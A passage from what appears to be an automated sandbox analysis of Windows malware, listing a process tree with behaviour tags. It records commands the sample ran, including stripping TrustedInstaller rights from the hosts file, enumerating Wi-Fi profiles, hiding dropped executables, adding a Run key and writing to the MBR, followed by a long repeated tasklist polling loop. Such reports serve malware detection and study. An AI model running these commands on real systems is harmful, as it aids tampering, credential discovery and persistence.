        icacls C:\Windows\System32\drivers\etc\hosts /remove "NT AUTHORITY\TrustedInstaller"
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:6260
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Checkpoint-Computer -Description \"Windows Update\" -RestorePointType \"MODIFY_SETTINGS\""
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3172
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "echo %COMPUTERNAME%"
        7⤵
        
        PID:6912
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
        7⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:7096
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:7004
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        8⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:6928
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "echo %USERNAME%"
        7⤵
        
        PID:6784
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show interfaces"
        7⤵
        
        PID:6048
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show interfaces
        8⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:6996
        
        C:\Windows\SYSTEM32\attrib.exe
        
        attrib +h C:\Users\Admin\AppData\Roaming\sharedfiles
        7⤵
        Views/modifies file attributes
        
        PID:6452
        
        C:\Windows\SYSTEM32\attrib.exe
        
        attrib +h C:\Users\Admin\AppData\Roaming\sharedfiles\ic8Ruq4f3P9sRPW.exe
        7⤵
        Views/modifies file attributes
        
        PID:6340
        
        C:\Users\Admin\AppData\Roaming\sharedfiles\ic8Ruq4f3P9sRPW.exe
        
        "C:\Users\Admin\AppData\Roaming\sharedfiles\ic8Ruq4f3P9sRPW.exe"
        7⤵
        Executes dropped EXE
        
        PID:6516
        
        C:\Users\Admin\AppData\Roaming\sharedfiles\linksharedfiles\venus.exe
        
        "C:\Users\Admin\AppData\Roaming\sharedfiles\linksharedfiles\venus.exe"
        7⤵
        Executes dropped EXE
        Writes to the Master Boot Record (MBR)
        System Location Discovery: System Language Discovery
        
        PID:5124
        
        C:\Users\Admin\AppData\Roaming\sharedfiles\linksharedfiles\Blueman.exe
        
        "C:\Users\Admin\AppData\Roaming\sharedfiles\linksharedfiles\Blueman.exe"
        7⤵
        Executes dropped EXE
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:5288
        
        C:\Users\Admin\Downloads\rgbaddon\._cache_Blueman.exe
        
        "C:\Users\Admin\Downloads\rgbaddon\._cache_Blueman.exe"
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5024
        
        C:\ProgramData\Synaptics\Synaptics.exe
        
        "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:6692
        
        C:\Users\Admin\Downloads\rgbaddon\._cache_Synaptics.exe
        
        "C:\Users\Admin\Downloads\rgbaddon\._cache_Synaptics.exe" InjUpdate
        9⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:828
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:3476
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:2908
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:1876
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5616
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6996
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:7020
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:7148
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:4492
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:2084
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:3832
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:1984
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:1828
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:1544
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:1472
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:224
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:3704
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6992
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:7004
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:7120
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:4448
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:4188
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:3708
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:1572
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:3444
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:3116
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:1108
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:1096
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:2368
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6076
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6368
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6364
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6136
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:2516
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6424
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:5736
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6888
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5516
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:5672
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6904
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5588
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6580
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:7100
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:6328
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:7040
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6960
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:5440
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:6540
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6528
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6980
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:5176
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:5868
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:6856
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:960
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:5708
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6728
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:4528
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:4876
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:572
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:3872
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:4608
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:3444
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:3308
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:1056
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:3396
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:3012
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:1064
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:4184
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:1636
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:2272
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:2080
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:1744
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:3476
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:1924
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:4220
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:3000
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:832
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:4848
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:1912
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:3456
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:2600
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:3532
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:3008
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:2420
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:2028
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:2932
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:428
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:3108
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:1708
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:2736
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:2032
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:4060
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:4820
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:4268
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:1140
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:4924
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:2356
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:1096
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:568
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:3752
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:1376
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:4120
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:1852
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:1372
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:5860
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:5656
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6072
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:552
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:5312
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:1608
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:4148
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:5300
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6280
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:5688
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6448
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5928
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:2908
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:5592
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5216
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:288
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:300
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5996
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6392
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:5904
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5596
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:6256
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6568
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6716
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6756
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6364
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6864
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:5744
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:5908
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6888
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:5516
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6724
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5672
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6920
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:5616
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:7000
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6440
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:2972
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6468
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6912
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6932
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6192
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:5380
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:5456
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6436
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:5136
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6004
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:7032
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:7096
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6472
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5588
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:1184
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:5264
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:6020
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:5284
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6996
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5476
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6348
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:4844
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5364
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:5260
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:5500
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6528
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:7060
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:7068
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5632
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6324
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:3640
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6604
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:1632
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:4752
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:2912
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:2176
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:2312
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6688
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:3908
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:3168
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:3448
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6392
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:5532
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:5796
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6384
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6364
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6716
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6496
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:3080
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6272
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:2716
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:5304
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6472
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:5940
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6584
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:5724
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6184
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:5260
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6528
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:5896
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:5184
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:940
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:5884
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:1572
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:1588
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:1260
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:5436
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:2660
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:2924
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:1796
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5300
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:664
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:5916
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:4556
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:5348
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:412
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6772
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:1456
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:1600
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:3720
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:3156
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:4884
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6064
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6392
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6700
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:6096
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6316
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6732
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:7092
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6636
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:5460
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:6412
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:2376
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:4500
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:1300
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:4232
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6264
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:6828
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
